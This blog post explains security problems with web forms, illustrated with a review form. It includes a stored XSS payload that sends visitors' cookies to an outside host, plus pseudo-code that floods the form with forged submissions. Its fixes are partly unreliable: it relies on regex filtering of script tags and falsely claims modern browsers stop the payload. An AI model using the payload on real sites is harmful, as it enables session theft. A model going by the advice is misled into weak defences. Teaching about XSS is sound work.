Web Applications Security – Forms, when not well formed

Over whelming responses on the part 1 of this series was awesome, lots of queries via twitter and bunch of good comments excited me to write on higher frequency, taking a note of same now. As promised to provide solution to query asked in part 1, it flows down below:

Practically there will be lots of address and lots of things that you can pass on as gift and for sure, it would be a better idea to do something like this:

// let us assume that current user will send gift as a deliverable to himself/herself
// we will address the issue to send the gift to her/him in upcoming days
if(isUserRegisteredWithAddress(address)){
performDelivery("gift","address");
}

We will continue toward better solutions throughout the series but don’t hesitate to post your just now.

Okay, let’s fasten our seat belts again to have a fast paced ride.

When I asked many developers which is the most important tag you think?  Most of them answered <form> tag because it is the thing that does everything way round between site and its user.

As a security concern <form> tag is “the one” tag which needs to be taken care of the most, lets discuss the various security concerns with this element, later we will discuss various approach to solve these concerns.

1. Cross site scripting

The de’facto well known hack out there using javascript. Let’s see how it works. Consider a form like this:

<form action="SaveReview" method="GET">
  Your name: <input type="text" name="name">
  Your review: <input type="text" name="review">
  <input type="submit" value="Submit">
</form>

Okay, now there comes an user and enter his name prady and in the review field enters this:

<script>
document.location = 'http://pradeep-kumar.in/stealCookies?cookies=' + document.cookie;
</script>

You probably take review of particular user to show it somewhere on your site. You tried to show prady’s reviews and what’s this? He got cookies of different users. Your users being dumped in someway other.

2. Spoofed form submission

Now for the above form, someone can easily program bogus form submissions. That can be done something like below by anyone in any technology of his/her choice

//initialize variables
name=prady;
review=review;
WHILE(1){
//initiate a new http request and repeatably forge
request='http://yoursite.com/saveReview?name=' + name + '&review=' + review;
name=randomize(name);
review=randomize(review);
}

Your site will be overwhelming by reviews in a very short period of time.

Fixing the problems

Lets discuss a fix for XSS attack. We can dis-allow <script> tag by using regular expressions in our controller for saving new reviews. Most of the frameworks and CMS do that for you, take care of this issue for code re-use and better maintainability.

Now comes forged formed submission. Here we can include a encrypted form number in a hidden field in form and save the same somewhere on server, when user submits form, we can cross check the validity of form itself by matching form number in GET request against stored ones on server.

These are just some fixes to the problems, most of them already taken care like most browsers doesn’t allow cross-domain ajax requests just because of existence of  XSS there. So, script posted above will not work in modern browsers. Please post your solutions to problems in the comments and stay tuned for next post.

See you soon.